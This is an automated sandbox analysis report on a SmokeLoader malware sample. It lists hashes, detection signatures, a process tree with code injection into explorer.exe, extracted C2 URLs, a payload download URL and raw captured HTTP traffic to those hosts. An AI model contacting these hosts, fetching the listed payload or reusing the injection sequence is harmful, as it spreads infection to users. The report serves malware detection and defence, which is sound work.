
Windows Analysis Report qhQ6armJ25.exe

Overview

General Information

Sample Name: qhQ6armJ25.exe
Analysis ID: 528745
MD5: 9953acb0fee6c45fc5aa12d21ac3ad1b
SHA1: afaf20c658c307f53e804639710c2dce09e9c3ba
SHA256: 5231916fbeb9c166a9bbb4e7c576b210019a3a84c17cbe777cb099ab3aad5dd8
Tags: Dofoil, exe, SmokeLoader

Detection

SmokeLoader
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Multi AV Scanner detection for submitted file
Benign windows process drops PE files
Yara detected SmokeLoader
System process connects to network (likely due to code injection or exploit)
Antivirus detection for URL or domain
Multi AV Scanner detection for domain / URL
Maps a DLL or memory area into another process
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Machine Learning detection for sample
Injects a PE file into a foreign processes
Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation))
Contains functionality to inject code into remote processes
Deletes itself after installation
Machine Learning detection for dropped file
C2 URLs / IPs found in malware configuration
Creates a thread in another existing process (thread injection)
Hides that the sample has been downloaded from the Internet (zone.identifier)
Checks if the current machine is a virtual machine (disk enumeration)
Uses 32bit PE files
Contains functionality to check if a debugger is running (IsDebuggerPresent)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Contains functionality to call native functions
Contains functionality to dynamically determine API calls
Downloads executable code via HTTP
Creates a DirectInput object (often for capturing keystrokes)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Drops files with a non-matching file extension (content does not match file extension)
PE file contains strange resources
Drops PE files
Tries to load missing DLLs
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Checks if the current process is being debugged
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

Process Tree

  • System is w10x64
  • qhQ6armJ25.exe (PID: 7112 cmdline: "C:\Users\user\Desktop\qhQ6armJ25.exe" MD5: 9953ACB0FEE6C45FC5AA12D21AC3AD1B)
    • qhQ6armJ25.exe (PID: 7144 cmdline: "C:\Users\user\Desktop\qhQ6armJ25.exe" MD5: 9953ACB0FEE6C45FC5AA12D21AC3AD1B)
      • explorer.exe (PID: 3424 cmdline: C:\Windows\Explorer.EXE MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • D380.exe (PID: 6328 cmdline: C:\Users\user\AppData\Local\Temp\D380.exe MD5: 61BA8F1EDCD03481D6447E8EC34DC383)
          • D380.exe (PID: 5456 cmdline: C:\Users\user\AppData\Local\Temp\D380.exe MD5: 61BA8F1EDCD03481D6447E8EC34DC383)
  • gahfeaj (PID: 5032 cmdline: C:\Users\user\AppData\Roaming\gahfeaj MD5: 9953ACB0FEE6C45FC5AA12D21AC3AD1B)
    • gahfeaj (PID: 6344 cmdline: C:\Users\user\AppData\Roaming\gahfeaj MD5: 9953ACB0FEE6C45FC5AA12D21AC3AD1B)
  • cleanup

Malware Configuration

Threatname: SmokeLoader

{"C2 list": ["http://nalirou70.top/", "http://xacokuo80.top/"]}

Yara Overview

Memory Dumps

Source | Rule | Description | Author | Strings
00000005.00000002.834313384.0000000000460000.00000004.00000001.sdmp | JoeSecurity_SmokeLoader_2 | Yara detected SmokeLoader | Joe Security |
00000001.00000002.765681019.0000000000640000.00000004.00000001.sdmp | JoeSecurity_SmokeLoader_2 | Yara detected SmokeLoader | Joe Security |
00000002.00000000.748566688.0000000004F01000.00000020.00020000.sdmp | JoeSecurity_SmokeLoader_2 | Yara detected SmokeLoader | Joe Security |
00000005.00000002.834484758.00000000005A1000.00000004.00020000.sdmp | JoeSecurity_SmokeLoader_2 | Yara detected SmokeLoader | Joe Security |
00000001.00000002.765917923.0000000002051000.00000004.00020000.sdmp | JoeSecurity_SmokeLoader_2 | Yara detected SmokeLoader | Joe Security |

Sigma Overview

No Sigma rule has matched

Jbx Signature Overview


AV Detection:

Found malware configuration
Source: 00000005.00000002.834313384.0000000000460000.00000004.00000001.sdmp | Malware Configuration Extractor: SmokeLoader {"C2 list": ["http://nalirou70.top/", "http://xacokuo80.top/"]}
Multi AV Scanner detection for submitted file
Source: qhQ6armJ25.exe | Virustotal: Detection: 45%
Antivirus detection for URL or domain
Source: http://nalirou70.top/ | Avira URL Cloud: Label: phishing
Source: http://privacytoolzfor-you7000.top/downloads/toolspab2.exe | Avira URL Cloud: Label: malware
Multi AV Scanner detection for domain / URL
Source: privacytoolzfor-you7000.top | Virustotal: Detection: 6%
Source: xacokuo80.top | Virustotal: Detection: 7%
Source: nalirou70.top | Virustotal: Detection: 10%
Source: http://xacokuo80.top/ | Virustotal: Detection: 7%
Machine Learning detection for sample
Source: qhQ6armJ25.exe | Joe Sandbox ML: detected
Machine Learning detection for dropped file
Source: C:\Users\user\AppData\Roaming\gahfeaj | Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\D380.exe | Joe Sandbox ML: detected
Source: qhQ6armJ25.exe | Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
Source: Binary string: xd?#C:\kotofaru\tenexut.pdbP+C source: qhQ6armJ25.exe, gahfeaj.2.dr
Source: Binary string: C:\loc vetudigalol\6_di.pdbP+C source: D380.exe, 00000004.00000000.800740573.0000000000401000.00000020.00020000.sdmp, D380.exe, 00000004.00000002.820427647.0000000000401000.00000020.00020000.sdmp, D380.exe, 00000006.00000000.817319243.0000000000401000.00000020.00020000.sdmp, D380.exe.2.dr
Source: Binary string: C:\loc vetudigalol\6_di.pdb source: D380.exe, 00000004.00000000.800740573.0000000000401000.00000020.00020000.sdmp, D380.exe, 00000004.00000002.820427647.0000000000401000.00000020.00020000.sdmp, D380.exe, 00000006.00000000.817319243.0000000000401000.00000020.00020000.sdmp, D380.exe.2.dr
Source: Binary string: C:\kotofaru\tenexut.pdb source: qhQ6armJ25.exe, gahfeaj.2.dr

Networking:

System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\explorer.exe | Domain query: nalirou70.top
Source: C:\Windows\explorer.exe | Domain query: privacytoolzfor-you7000.top
Source: C:\Windows\explorer.exe | Domain query: xacokuo80.top
C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor | URLs: http://nalirou70.top/
Source: Malware configuration extractor | URLs: http://xacokuo80.top/
Source: Joe Sandbox View | ASN Name: RAPMSB-ASRU RAPMSB-ASRU
            Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.20.1Date: Thu, 25 Nov 2021 17:24:50 GMTContent-Type: application/x-msdos-programContent-Length: 302592Connection: closeLast-Modified: Thu, 25 Nov 2021 17:24:01 GMTETag: "49e00-5d1a03d96f132"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 b0 b4 92 23 f4 d5 fc 70 f4 d5 fc 70 f4 d5 fc 70 9b a3 57 70 dd d5 fc 70 9b a3 62 70 e5 d5 fc 70 9b a3 56 70 97 d5 fc 70 fd ad 6f 70 ff d5 fc 70 f4 d5 fd 70 03 d5 fc 70 9b a3 53 70 f5 d5 fc 70 9b a3 66 70 f5 d5 fc 70 9b a3 61 70 f5 d5 fc 70 52 69 63 68 f4 d5 fc 70 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 04 00 2a 7d 9d 5f 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0a 00 00 08 03 00 00 b4 7c 01 00 00 00 00 20 7c 01 00 00 10 00 00 00 20 03 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 00 80 01 00 04 00 00 6b 2c 05 00 02 00 00 81 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 d4 fe 02 00 78 00 00 00 00 70 7e 01 f8 67 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 7e 01 d4 17 00 00 20 14 00 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 48 7a 01 00 40 00 00 00 00 00 00 00 00 00 00 00 00 10 00 00 cc 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 28 06 03 00 00 10 00 00 00 08 03 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 c0 41 7b 01 00 20 03 00 00 14 00 00 00 0c 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 f8 67 00 00 
00 70 7e 01 00 68 00 00 00 20 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 a8 14 01 00 00 e0 7e 01 00 16 01 00 00 88 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic | HTTP traffic detected: POST / HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: http://edwxjxx.net/ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Length: 151 | Host: xacokuo80.top
Source: global traffic | HTTP traffic detected: POST / HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: http://kwcurllpj.com/ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Length: 356 | Host: xacokuo80.top
Source: global traffic | HTTP traffic detected: GET /downloads/toolspab2.exe HTTP/1.1 | Connection: Keep-Alive | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Host: privacytoolzfor-you7000.top
Source: global traffic | HTTP traffic detected: POST / HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: http://tpjfndspxp.com/ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Length: 306 | Host: xacokuo80.top
            Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://tpjfndspxp.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 306Host: xacokuo80.topData Raw: 10 87 8a 95 6c 84 dc b4 cc 4b 0d 33 7b cf 90 8d 42 13 a8 37 d2 35 1f ed cf 9b db fe 88 a4 e0 84 1f b2 5a a5 1d 1a c5 e0 ec d9 f3 dd d0 80 11 1f 77 e5 14 88 d5 da fe b7 dc 6d bd a2 91 ba 77 d4 75 24 f3 c4 84 de 9e 66 5d 02 c9 a1 c1 64 5d dc cc 36 26 d3 5c 15 b2 01 6a 5c 14 07 e7 84 ce 30 cc b0 ae b5 3d 25 0d 30 1d be 6b 73 be 6e 00 63 62 97 66 e0 b8 67 ab 40 59 0e 6f 97 fc 77 29 7e b2 4f c1 96 77 61 fb e0 26 d2 56 0d 0a f9 29 cc 4f ad b9 ea ab 97 56 d4 22 82 28 2a 6c 5c 55 83 3d f7 b0 64 f9 f8 08 b9 9b 37 1f 15 be e3 e1 99 93 5d 6f b6 f5 80 bc b1 22 6a d9 9e dc f1 00 7c 14 6e 37 a8 b2 45 18 22 b9 f9 9b 25 99 7f 72 52 fc 51 43 bc 8e 1e c0 79 c4 3d c7 b3 36 77 c8 6f ed b0 95 49 97 de 45 26 d5 7a 3a b5 ba f8 c8 3f fc 8e 26 60 d2 7a 96 a4 79 42 fb be 60 a5 42 dc 55 54 0f 49 a2 fa 1d 5c 12 aa a1 3e 00 7b 47 1f 6c d6 d6 23 0d f4 60 fe 70 1a 03 b7 e6 44 69 47 9c 07 29 d9 50 d2 a2 e2 a2 54 8d cb e8 60 d8 2f 0d 66 Data Ascii: lK3{B75Zwmwu$f]d]6&\j\0=%0ksncbfg@Yow)~Owa&V)OV"(*l\U=d7]o"j|n7E"%rRQCy=6woIE&z:?&`zyB`BUTI\>{Gl#`pDiG)PT`/f
            Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://tpjfndspxp.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 306Host: xacokuo80.topData Raw: 10 87 8a 95 6c 84 dc b4 cc 4b 0d 33 7b cf 90 8d 42 13 a8 37 d2 35 1f ed cf 9b db fe 88 a4 e0 84 1f b2 5a a5 1d 1a c5 e0 ec d9 f3 dd d0 80 11 1f 77 e5 14 88 d5 da fe b7 dc 6d bd a2 91 ba 77 d4 75 24 f3 c4 84 de 9e 66 5d 02 c9 a1 c1 64 5d dc cc 36 26 d3 5c 15 b2 01 6a 5c 14 07 e7 84 ce 30 cc b0 ae b5 3d 25 0d 30 1d be 6b 73 be 6e 00 63 62 97 66 e0 b8 67 ab 40 59 0e 6f 97 fc 77 29 7e b2 4f c1 96 77 61 fb e0 26 d2 56 0d 0a f9 29 cc 4f ad b9 ea ab 97 56 d4 22 82 28 2a 6c 5c 55 83 3d f7 b0 64 f9 f8 08 b9 9b 37 1f 15 be e3 e1 99 93 5d 6f b6 f5 80 bc b1 22 6a d9 9e dc f1 00 7c 14 6e 37 a8 b2 45 18 22 b9 f9 9b 25 99 7f 72 52 fc 51 43 bc 8e 1e c0 79 c4 3d c7 b3 36 77 c8 6f ed b0 95 49 97 de 45 26 d5 7a 3a b5 ba f8 c8 3f fc 8e 26 60 d2 7a 96 a4 79 42 fb be 60 a5 42 dc 55 54 0f 49 a2 fa 1d 5c 12 aa a1 3e 00 7b 47 1f 6c d6 d6 23 0d f4 60 fe 70 1a 03 b7 e6 44 69 47 9c 07 29 d9 50 d2 a2 e2 a2 54 8d cb e8 60 d8 2f 0d 66 Data Ascii: lK3{B75Zwmwu$f]d]6&\j\0=%0ksncbfg@Yow)~Owa&V)OV"(*l\U=d7]o"j|n7E"%rRQCy=6woIE&z:?&`zyB`BUTI\>{Gl#`pDiG)PT`/f
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Thu, 25 Nov 2021 17:24:50 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 0d 0a 14 00 00 00 7b fa f0 1d b5 69 2b 2c 47 fa 0e a8 c1 82 9f 4f 1a c4 da 16 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 19{i+,GO0
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Thu, 25 Nov 2021 17:24:50 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 34 36 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad d6 09 4f d1 95 4f 11 6a 11 e9 b2 83 bd a6 0b a2 13 cc 2f ae 59 4a c3 55 a1 b9 67 f4 25 45 51 b8 f6 cb 41 e1 0e 88 16 95 e1 63 da 7d b3 ef d2 01 79 e4 a8 1d 63 a9 0d 0a 30 0d 0a 0d 0a Data Ascii: 46I:82OOj/YJUg%EQAc}yc0
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Thu, 25 Nov 2021 17:25:02 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 31 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 78 61 63 6f 6b 75 6f 38 30 2e 74 6f 70 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 191<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at xacokuo80.top Port 80</address></body></html>0
Source: unknown | HTTP traffic detected: POST / HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: http://edwxjxx.net/ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Length: 151 | Host: xacokuo80.top
Source: unknown | DNS traffic detected: queries for: nalirou70.top
Source: global traffic | HTTP traffic detected: GET /downloads/toolspab2.exe HTTP/1.1 | Connection: Keep-Alive | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Host: privacytoolzfor-you7000.top

Key, Mouse, Clipboard, Microphone and Screen Capturing:

Yara detected SmokeLoader
Source: Yara match | File source: 00000005.00000002.834313384.0000000000460000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000002.765681019.0000000000640000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000000.748566688.0000000004F01000.00000020.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000002.834484758.00000000005A1000.00000004.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000002.765917923.0000000002051000.00000004.00020000.sdmp, type: MEMORY
Source: D380.exe, 00000004.00000002.820813732.0000000001F09000.00000004.00000020.sdmp | Binary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>
Source: qhQ6armJ25.exe | Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
Source: C:\Users\user\Desktop\qhQ6armJ25.exe | Code function: 1_2_00401813 Sleep,NtTerminateProcess,1_2_00401813
Source: C:\Users\user\Desktop\qhQ6armJ25.exe | Code function: 1_2_00401842 Sleep,NtTerminateProcess,1_2_00401842
Source: C:\Users\user\Desktop\qhQ6armJ25.exe | Code function: 1_2_00402052 NtQuerySystemInformation,NtQuerySystemInformation,1_2_00402052
Source: C:\Users\user\Desktop\qhQ6armJ25.exe | Code function: 1_2_00402403 NtEnumerateKey,NtEnumerateKey,1_2_00402403
Source: C:\Users\user\Desktop\qhQ6armJ25.exe | Code function: 1_2_00401812 Sleep,NtTerminateProcess,1_2_00401812
Source: C:\Users\user\Desktop\qhQ6armJ25.exe | Code function: 1_2_0040202C NtQuerySystemInformation,NtQuerySystemInformation,1_2_0040202C
Source: C:\Users\user\Desktop\qhQ6armJ25.exe | Code function: 1_2_00401830 Sleep,NtTerminateProcess,1_2_00401830
Source: C:\Users\user\Desktop\qhQ6armJ25.exe | Code function: 1_2_00401833 Sleep,NtTerminateProcess,1_2_00401833
Source: C:\Users\user\Desktop\qhQ6armJ25.exe | Code function: 1_2_00401836 Sleep,NtTerminateProcess,1_2_00401836
Source: C:\Users\user\Desktop\qhQ6armJ25.exe | Code function: 1_2_004023D9 NtEnumerateKey,1_2_004023D9
Source: C:\Users\user\Desktop\qhQ6armJ25.exe | Code function: 1_1_00402052 NtQuerySystemInformation,NtQuerySystemInformation,1_1_00402052
Source: C:\Users\user\Desktop\qhQ6armJ25.exe | Code function: 1_1_004023D9 NtEnumerateKey,1_1_004023D9
Source: C:\Users\user\Desktop\qhQ6armJ25.exe | Code function: 1_1_00402403 NtEnumerateKey,NtEnumerateKey,1_1_00402403
Source: C:\Users\user\Desktop\qhQ6armJ25.exe | Code function: 1_1_0040202C NtQuerySystemInformation,NtQuerySystemInformation,1_1_0040202C
Source: C:\Users\user\AppData\Local\Temp\D380.exe | Code function: 4_2_01D20110 VirtualAlloc,GetModuleFileNameA,CreateProcessA,VirtualFree,VirtualAlloc,GetThreadContext,ReadProcessMemory,NtUnmapViewOfSection,VirtualAllocEx,NtWriteVirtualMemory,NtWriteVirtualMemory,WriteProcessMemory,SetThreadContext,ResumeThread,ExitProcess,4_2_01D20110
Source: C:\Users\user\AppData\Roaming\gahfeaj | Code function: 5_2_00401813 Sleep,NtTerminateProcess,5_2_00401813
Source: C:\Users\user\AppData\Roaming\gahfeaj | Code function: 5_2_00401842 Sleep,NtTerminateProcess,5_2_00401842
Source: C:\Users\user\AppData\Roaming\gahfeaj | Code function: 5_2_00402052 NtQuerySystemInformation,NtQuerySystemInformation,5_2_00402052
Source: C:\Users\user\AppData\Roaming\gahfeaj | Code function: 5_2_00402403 NtEnumerateKey,NtEnumerateKey,5_2_00402403
Source: C:\Users\user\AppData\Roaming\gahfeaj | Code function: 5_2_00401812 Sleep,NtTerminateProcess,5_2_00401812
Source: C:\Users\user\AppData\Roaming\gahfeaj | Code function: 5_2_0040202C NtQuerySystemInformation,NtQuerySystemInformation,5_2_0040202C
Source: C:\Users\user\AppData\Roaming\gahfeaj | Code function: 5_2_00401830 Sleep,NtTerminateProcess,5_2_00401830
Source: C:\Users\user\AppData\Roaming\gahfeaj | Code function: 5_2_00401833 Sleep,NtTerminateProcess,5_2_00401833
Source: C:\Users\user\AppData\Roaming\gahfeaj | Code function: 5_2_00401836 Sleep,NtTerminateProcess,5_2_00401836
Source: C:\Users\user\AppData\Roaming\gahfeaj | Code function: 5_2_004023D9 NtEnumerateKey,5_2_004023D9
Source: qhQ6armJ25.exe | Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: qhQ6armJ25.exe | Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: D380.exe.2.dr | Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: D380.exe.2.dr | Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: gahfeaj.2.dr | Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: gahfeaj.2.dr | Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: C:\Windows\explorer.exe | Section loaded: taskschd.dll
Source: C:\Windows\explorer.exe | Section loaded: dhcpcsvc6.dll
Source: C:\Windows\explorer.exe | Section loaded: dhcpcsvc.dll
Source: C:\Windows\explorer.exe | Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\explorer.exe | Section loaded: webio.dll
Source: C:\Windows\explorer.exe | Section loaded: mswsock.dll
Source: C:\Windows\explorer.exe | Section loaded: winnsi.dll
            Source: qhQ6armJ25.exeVirustotal: Detection: 45%
            Source: qhQ6armJ25.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
            Source: C:\Users\user\Desktop\qhQ6armJ25.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
            Source: unknownProcess created: C:\Users\user\Desktop\qhQ6armJ25.exe "C:\Users\user\Desktop\qhQ6armJ25.exe"
            Source: C:\Users\user\Desktop\qhQ6armJ25.exeProcess created: C:\Users\user\Desktop\qhQ6armJ25.exe "C:\Users\user\Desktop\qhQ6armJ25.exe"
            Source: unknownProcess created: C:\Users\user\AppData\Roaming\gahfeaj C:\Users\user\AppData\Roaming\gahfeaj
            Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\D380.exe C:\Users\user\AppData\Local\Temp\D380.exe
            Source: C:\Users\user\AppData\Roaming\gahfeajProcess created: C:\Users\user\AppData\Roaming\gahfeaj C:\Users\user\AppData\Roaming\gahfeaj
            Source: C:\Users\user\AppData\Local\Temp\D380.exeProcess created: C:\Users\user\AppData\Local\Temp\D380.exe C:\Users\user\AppData\Local\Temp\D380.exe
            Source: C:\Users\user\Desktop\qhQ6armJ25.exeProcess created: C:\Users\user\Desktop\qhQ6armJ25.exe "C:\Users\user\Desktop\qhQ6armJ25.exe" Jump to behavior
            Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\D380.exe C:\Users\user\AppData\Local\Temp\D380.exeJump to behavior
            Source: C:\Users\user\AppData\Roaming\gahfeajProcess created: C:\Users\user\AppData\Roaming\gahfeaj C:\Users\user\AppData\Roaming\gahfeajJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\D380.exeProcess created: C:\Users\user\AppData\Local\Temp\D380.exe C:\Users\user\AppData\Local\Temp\D380.exeJump to behavior
            Source: C:\Windows\explorer.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32Jump to behavior
            Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Roaming\gahfeajJump to behavior
            Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Local\Temp\D380.tmpJump to behavior
            Source: classification engineClassification label: mal100.troj.evad.winEXE@10/3@10/1
            Source: qhQ6armJ25.exeStatic PE information: More than 200 imports for KERNEL32.dll
            Source: qhQ6armJ25.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
            Source: qhQ6armJ25.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
            Source: qhQ6armJ25.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
            Source: qhQ6armJ25.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
            Source: qhQ6armJ25.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
            Source: qhQ6armJ25.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
            Source: qhQ6armJ25.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
            Source: Binary string: xd?#C:\kotofaru\tenexut.pdbP+C source: qhQ6armJ25.exe, gahfeaj.2.dr
            Source: Binary string: C:\loc vetudigalol\6_di.pdbP+C source: D380.exe, 00000004.00000000.800740573.0000000000401000.00000020.00020000.sdmp, D380.exe, 00000004.00000002.820427647.0000000000401000.00000020.00020000.sdmp, D380.exe, 00000006.00000000.817319243.0000000000401000.00000020.00020000.sdmp, D380.exe.2.dr
            Source: Binary string: C:\loc vetudigalol\6_di.pdb source: D380.exe, 00000004.00000000.800740573.0000000000401000.00000020.00020000.sdmp, D380.exe, 00000004.00000002.820427647.0000000000401000.00000020.00020000.sdmp, D380.exe, 00000006.00000000.817319243.0000000000401000.00000020.00020000.sdmp, D380.exe.2.dr
            Source: Binary string: C:\kotofaru\tenexut.pdb source: qhQ6armJ25.exe, gahfeaj.2.dr
